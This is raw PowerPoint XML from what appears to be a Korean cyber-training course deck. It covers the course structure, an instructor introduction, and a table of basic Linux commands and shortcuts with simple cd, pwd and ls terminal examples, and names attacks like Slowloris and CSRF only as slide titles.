                        <a:t>(Backdoor)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Ping Of Death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Slowloris Attack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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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CSRF</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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>이론</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>사이버전 실습체계 구조</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</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a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://kitribob.wiki/wiki/%EB%B0%B1%EB%8F%84%EC%9A%B0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>2016</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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a:t>Best Of Best 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>취약점트랙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.kitribob.kr/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>LMS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>LMS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>단위과제 기반 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시나리오 기반 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방어 실습체계</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>체계 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 기본 명령어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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29653521"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4681220"/>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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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base</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기본 유용한 명령어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>단축키</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>pwd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현재 디렉토리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>경로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 출력</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cd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경로 이동</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디렉토리 목록 확인</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rPr>
                        <a:t>sudo</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>mkdir</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디렉토리 생성</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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22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 편집 도구</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8" action="ppaction://hlinksldjump"/>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touch</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파일생성 및 날짜정보 변경</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rPr>
                        <a:t>tshark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네트워크 트래픽 편집 도구</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9" action="ppaction://hlinksldjump"/>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cat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파일생성 및 출력</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여러 개의 파일 합치기</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0" action="ppaction://hlinksldjump"/>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rm</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파일이나 디렉토리를 삭제</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1" action="ppaction://hlinksldjump"/>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mv</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 혹은 디렉토리 이동</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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>wget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2" action="ppaction://hlinksldjump"/>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cp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 혹은 디렉토리를 복사</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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>27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awk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문장 중 특정 단어로의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>split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4" action="ppaction://hlinksldjump"/>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man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리눅스 매뉴얼 출력</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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>28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정렬</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6" action="ppaction://hlinksldjump"/>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head/tail</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파일을 보고싶은 줄 수만큼 보여준다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>29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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>uniq</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중복이 없는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sort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8" action="ppaction://hlinksldjump"/>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find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특정 파일이나 디렉토리를 검색한다</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19" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>30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sed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비대화형 편집기</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0" action="ppaction://hlinksldjump"/>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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>chmod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파일의 권한 변경</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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>ps</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현재 실행중인 프로세스 목록</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1" action="ppaction://hlinksldjump"/>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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>chown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파일의 소유자 변경</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kill</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프로세스 강제 중지</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2" action="ppaction://hlinksldjump"/>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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>chgrp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파일의 그룹 변경</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3" action="ppaction://hlinksldjump"/>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cut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필드를 출력한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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24" action="ppaction://hlinksldjump"/>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시스템 전체 서비스 호출</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26"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/Theory/T2/0</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ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>기본 유용한 명령어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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81220"/>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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>init</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 5</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Visual mode </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로 진입한다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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화면 클리어</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Ex) find --help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명령어에 대한 설명을 볼 수 있다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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터미널 실행</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Ctrl</a:t>
                      </a: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 Shift + Q</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터미널 종료</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터미널 내에서 문자열 검색</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Shift + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Pgup</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Pgdn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="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터미널 에서 스크롤 위 아래</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실행 중인 프로그램 중지</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실행 중인 프로그램 일시 정지</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일시 정지된 프로그램 다시 실행</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자동 완성</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로그아웃</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위 화살표</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이전 명령어</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복사하기</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>붙혀넣기</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Alt F1 ~ F12</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콘솔 이동</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Alt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한영 전환</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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현재 디렉토리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 출력</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T2/2</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cd : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로 이동</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var]# cd /var/log</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log]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/var/log</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log]# cd ..</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var]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/var</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var]# cd ~</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/root</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cd /</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>pwd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</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cd -</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</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a:t>2018</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>고려대학교 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>사이버국방학과 졸업 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="140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/Theory/T2/3</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ls : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>디렉토리 목록 확인</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home]# cd /export</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>err.log  err_url.txt  home  repo</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-l</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0 12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>3  2014 err.log</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0 12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>3  2014 err_url.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 4 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096 10</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>29  2017 home</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 5 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>4 20:17 repo</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-a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  ..  err.log  err_url.txt  home  repo</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-al</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>20</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
